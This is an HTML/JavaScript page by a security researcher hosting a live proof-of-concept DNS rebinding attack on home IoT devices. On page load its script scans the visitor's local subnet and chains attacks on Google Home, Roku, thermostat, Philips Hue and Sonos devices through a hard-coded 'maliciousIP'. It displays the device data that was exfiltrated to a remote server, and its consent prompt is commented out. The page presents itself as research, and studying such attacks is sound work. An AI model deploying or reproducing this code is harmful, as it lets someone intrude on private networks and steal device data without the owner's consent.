<!DOCTYPE html>
<html lang="sr-Latn-u-em-text">
<head>
    <title>DNS Rebinding Attack</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script type="text/javascript" src="/share/js/vue.js"></script>
    <link rel="stylesheet" href="../css/style.css">
    
    <!-- Matomo -->
    <script type="text/javascript">
      var _paq = _paq || [];
      /* tracker methods like "setCustomDimension" should be called before "trackPageView" */
      _paq.push(["setDocumentTitle", document.domain + "/" + document.title]);
      _paq.push(["setCookieDomain", "*.rebind.network"]);
      _paq.push(["setDomains", ["*.rebind.network"]]);
      _paq.push(['trackPageView']);
      _paq.push(['enableLinkTracking']);
      (function() {
        var u="//piwik.brannon.online/";
        _paq.push(['setTrackerUrl', u+'piwik.php']);
        _paq.push(['setSiteId', '3']);
        var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0];
        g.type='text/javascript'; g.async=true; g.defer=true; g.src=u+'piwik.js'; s.parentNode.insertBefore(g,s);
      })();
    </script>
    <noscript><p><img src="//piwik.brannon.online/piwik.php?idsite=3&amp;rec=1" style="border:0;" alt="" /></p></noscript>
    <!-- End Matomo Code -->
    
</head>
<body>

<div id='app'>
    <div class='header'>
        <h1>DNS Rebinding Attack</h1>
        <div>Looking for vulnerable IoT devices on your home network.</div>
        <br>
        <div v-if='ips.length > 1'>Scanning {{ips.length}} IP addresses from {{startIp}} to {{endIp}}</div>
        <div><b>Google Home</b> IPs finished/started: {{googleHome.finishedIps.length}}/{{googleHome.startedIps.length}}</div>
        <div><b>Roku</b> IPs finished/started: {{roku.finishedIps.length}}/{{roku.startedIps.length}}</div>
        <div><b>Radio Thermostat</b> IPs finished/started: {{radioThermostat.finishedIps.length}}/{{radioThermostat.startedIps.length}}</div>
        <div><b>Phillips Hue bridge</b> IPs finished/started: {{phillips.finishedIps.length}}/{{phillips.startedIps.length}}</div>
        <div><b>Sonos speaker</b> IPs finished/started: {{sonos.finishedIps.length}}/{{sonos.startedIps.length}}</div>
        <br>
        <p id="long-description">
        This proof-of-concept attack is a demonstration of DNS rebinding attacks in general and was created as a component in larger research on the subject in general. If you are interested in learning more you can read about the research in <a href="https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325" target="_blank">this blog post</a>. You can also find source code <a href="https://github.com/brannondorsey/dns-rebind-toolkit" target="_blank">here</a> and <a href="https://github.com/brannondorsey/whonow" target="_blank">here</a>.
        <p>
        <p>❤️ <a href="https://brannon.online" target="_blank">Brannon Dorsey</a>
            <br>
            <a href="https://twitter.com/brannondorsey" target="_blank">🐦</a>
            &nbsp;
            <a href="https://github.com/brannondorsey">💻</a>
        </p>
        <br>
        <div v-if="Object.keys(roku.devices).length > 0" class="warning">{{Object.keys(roku.devices).length}} Roku found</div>
        <div v-if="Object.keys(googleHome.devices).length > 0" class="warning">{{Object.keys(googleHome.devices).length}} Google Home found</div>
        <div v-if="Object.keys(radioThermostat.devices).length > 0" class="warning">{{Object.keys(radioThermostat.devices).length}} Radio Thermostat found</div>
        <div v-if="Object.keys(phillips.devices).length > 0" class="warning">{{Object.keys(phillips.devices).length}} Phillips Hue Bridge found</div>
        <div v-if="Object.keys(sonos.devices).length > 0" class="warning">{{Object.keys(sonos.devices).length}} Sonos speaker found</div>

    </div>
    <div>
        <div v-if='!deviceFound()' style='text-align: center;'>
            <img id='loading' src="loading.gif" >
            <br>
            <br>
        </div>
        <div v-else >
            <div class='info'>
                The DNS Rebind attack was successful and a device has been found on your network. Your browser has been tricked into violating the <a href="https://en.wikipedia.org/wiki/Same-origin_policy" target="_blank">Same-Origin Policy</a> and HTTP requests have been made to interact with a device on your local network. <span class='warning'>The information below has been exfiltrated from your device and sent to a remote server that you do not control.</span>
            </div>
            <div v-for='d in getDevices()' class=device>
                <pre>{{d}}</pre>
            </div>
        </div>
</div>

<script type="text/javascript" src="/share/js/EventEmitter.js"></script>
<script type="text/javascript" src="/share/js/DNSRebindAttack.js"></script>
<script type="text/javascript">

    // alert('JavaScript code on this page may interact with your local network. By proceeding, you acknowledge consent and authorization to participate in a proof-of-concept DNS Rebind attack.')

    const shuffleArray = arr => arr.sort(() => Math.random() - 0.5)

    let ips = []

    DNSRebindAttack.getLocalIPAddress()
    .then(ip => launchAttack(ip))
    .catch(err => {
        console.error(err)
        launchAttack('192.168.1.1')
    })

    function launchAttack(localIp) {

        // convert 192.168.1.1 into array from 192.168.1.0 - 192.168.1.255
        const first3Octets = localIp.substring(0, localIp.lastIndexOf('.'))
        ips = [...Array(256).keys()].map(octet => `${first3Octets}.${octet}`)

        // ips = ['192.168.1.7']
        app.startIp = ips[0]
        app.endIp = ips[ips.length - 1]

        shuffleArray(ips)

        app.ips = ips

        const thermostat = new DNSRebindAttack('rebind.network', 80)
        const roku = new DNSRebindAttack('rebind.network', 8060)
        const googleHome = new DNSRebindAttack('rebind.network', 8008)
        const phillips = new DNSRebindAttack('rebind.network', 80)
        const sonos = new DNSRebindAttack('rebind.network', 1400)

        const maliciousIP = '34.192.228.43'
        // const maliciousIP = '127.0.0.1'
        googleHome.attack(ips, maliciousIP, 'payloads/google-home.html', 200)

        // when the first attack is done, start the second
        googleHome.on('all-iframes-added', () => {
            roku.attack(ips, maliciousIP, 'payloads/roku-info.html', 200)
        })

        // when the second attack is done, start the third
        roku.on('all-iframes-added', () => {
            thermostat.attack(ips, maliciousIP, 'payloads/radio-thermostat.html', 200)
        })

        // when the third is done, start the fourth
        thermostat.on('all-iframes-added', () => {
            phillips.attack(ips, maliciousIP, 'payloads/phillips-hue.html', 200)
        })

        // when the fourth is done, start the fifth
        phillips.on('all-iframes-added', () => {
            sonos.attack(ips, maliciousIP, 'payloads/sonos-info.html', 200)
        })

        roku.nodes.on('begin', begin('roku'))
        thermostat.nodes.on('begin', begin('radioThermostat'))
        googleHome.nodes.on('begin', begin('googleHome'))
        phillips.nodes.on('begin', begin('phillips'))
        sonos.nodes.on('begin', begin('sonos'))

        roku.nodes.on('destroy', destroy('roku'))
        thermostat.nodes.on('destroy', destroy('radioThermostat'))
        googleHome.nodes.on('destroy', destroy('googleHome'))
        phillips.nodes.on('destroy', destroy('phillips'))
        sonos.nodes.on('destroy', destroy('sonos'))

        roku.nodes.on('exfiltrate', exfiltrate('roku'))
        thermostat.nodes.on('exfiltrate', exfiltrate('radioThermostat'))
        googleHome.nodes.on('exfiltrate', exfiltrate('googleHome'))
        phillips.nodes.on('exfiltrate', exfiltrate('phillips'))
        sonos.nodes.on('exfiltrate', exfiltrate('sonos'))

        function begin(device) {
            return function(ip) {
                app[device].startedIps.push(ip)
                console.log(ip)
            }
        }

        function destroy(device) {
            return function(ip) {
                app[device].finishedIps.push(ip)
            }
        }

         function exfiltrate(device) {
            return function(ip, data) {
                if (device != 'sonos') {
                    data = JSON.stringify(data, null, 4)
                }
                app[device].devices[ip] = data
            }
        }
    }

    const app = new Vue({
        el: '#app',
        data: {
            startIp: null,
            endIp: null,
            ips: ips,
            roku: {
                finishedIps: [],
                startedIps: [],
                devices: {
                    // '192.168.1.25': {
                    // 	ip: '192.168.1.25',
                    // }
                }
            },
            googleHome: {
                finishedIps: [],
                startedIps: [],
                devices: {}
            },
            radioThermostat: {
                finishedIps: [],
                startedIps: [],
                devices: {}
            },
            phillips: {
                finishedIps: [],
                startedIps: [],
                devices: {}
            },
            sonos: {
                finishedIps: [],
                startedIps: [],
                devices: {}
            }
        },
        methods: {
            deviceFound: function() {
                return this.getDevices().length > 0
            },
            getDevices: function() {
                return  [...Object.values(this.googleHome.devices),
                         ...Object.values(this.roku.devices),
                         ...Object.values(this.radioThermostat.devices),
                         ...Object.values(this.phillips.devices),
                         ...Object.values(this.sonos.devices)]
            }
        }
    })
</script>
</body>
</html>
